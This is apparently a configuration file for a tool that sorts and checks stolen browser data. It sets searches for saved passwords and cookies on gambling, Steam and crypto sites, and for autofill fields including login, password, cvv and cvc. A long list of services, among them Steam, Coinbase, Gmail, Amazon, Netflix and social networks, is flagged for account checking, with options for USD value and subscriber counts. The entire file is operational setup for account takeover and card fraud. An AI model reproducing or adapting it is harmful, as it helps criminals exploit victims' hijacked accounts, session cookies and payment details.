[====================SOFT====================]
THEME=Gray;
ACCENT=LightBlue;
THREADS=1;
RECHECK_ERRORS=2;
TIMEOUT=10000;
PROXY_TYPE=0;
PROXY_FORMAT=ip_port;

PasswordSearch="stake.com;steampowered.com"
CookiesSearch="stake.com;steampowered.com;blockchain.info"
AutofillsSearch="email;password;username;login;code;cvv;cvc;"

[===============MAIL LATTER SEARCH===============]
GmailSearch=""
YahooSearch=""
RamblerSearch=""
OutlookSearch=""
AolSearch=""
YandexSearch=""
MailruSearch=""

[====================SERVICES====================]
Steam:check=1;change_timestamp=1;save_full_log=0;show_log=1;convert_to_usd=1;
Roblox:check=1;change_timestamp=0;save_full_log=0;show_log=1;
HumbleBundle:check=1;change_timestamp=0;save_full_log=0;show_log=1;
PSN:check=1;change_timestamp=0;save_full_log=0;show_log=1;
Genshin:check=1;change_timestamp=0;save_full_log=0;show_log=1;
Tarkov:check=1;change_timestamp=0;save_full_log=0;show_log=1;
Freebitco.in:check=0;change_timestamp=0;save_full_log=0;show_log=1;
Coinbase:check=0;change_timestamp=0;save_full_log=0;show_log=1;
Minecraft:check=0;change_timestamp=0;save_full_log=0;show_log=1;
Reddit:check=0;change_timestamp=0;save_full_log=0;show_log=1;
YouTube:check=1;change_timestamp=0;save_full_log=0;save_full_log_ytsubs>=0;
Twitch:check=1;change_timestamp=0;save_full_log=0;save_full_log_twsubs>=0;show_log=1;
TikTok:check=1;change_timestamp=0;save_full_log=0;save_full_log_ttsubs>=0;show_log=1;
Instagram:check=1;change_timestamp=0;save_full_log=0;save_full_log_instsubs>=0;show_log=1;
Twitter:check=1;change_timestamp=0;save_full_log=0;save_full_log_twittersubs>=0;show_log=1;
Facebook:check=1;change_timestamp=0;save_full_log=0;show_log=1;check_ads=0;
Amazon:check=1;change_timestamp=0;save_full_log=0;omc=1;show_log=1;
Netflix:check=1;change_timestamp=0;save_full_log=0;show_log=1;
WordPress:check=0;change_timestamp=0;save_full_log=0;show_log=1;
GooglePay:check=0;change_timestamp=0;save_full_log=0;show_log=1;
Indeed:check=0;change_timestamp=0;save_full_log=0;show_log=1;
Rambler:check=1;change_timestamp=0;save_full_log=0;show_log=1;
Outlook:check=1;change_timestamp=0;save_full_log=0;show_log=1;
Yandex.ru:check=1;change_timestamp=0;save_full_log=0;show_log=1;
Mail.ru:check=1;change_timestamp=0;save_full_log=0;show_log=1;
Aol.com:check=1;change_timestamp=0;save_full_log=0;show_log=1;
Yahoo:check=1;change_timestamp=0;save_full_log=0;show_log=1;new_method=1;
Gmail:check=1;change_timestamp=0;save_full_log=0;show_log=1;new_method=1;
FunPay:check=1;change_timestamp=0;save_full_log=0;show_log=1;
Linkedin:check=1;change_timestamp=0;save_full_log=0;show_log=1;
Vinted:check=0;change_timestamp=0;save_full_log=0;show_log=1;
Project1:change_timestamp=0;save_full_log=0;show_log=1;
Project2:change_timestamp=0;save_full_log=0;show_log=1;
Project3:change_timestamp=0;save_full_log=0;show_log=1;
Project4:change_timestamp=0;save_full_log=0;show_log=1;
Project5:change_timestamp=0;save_full_log=0;show_log=1;
Project6:change_timestamp=0;save_full_log=0;show_log=1;
Project7:change_timestamp=0;save_full_log=0;show_log=1;
Project8:change_timestamp=0;save_full_log=0;show_log=1;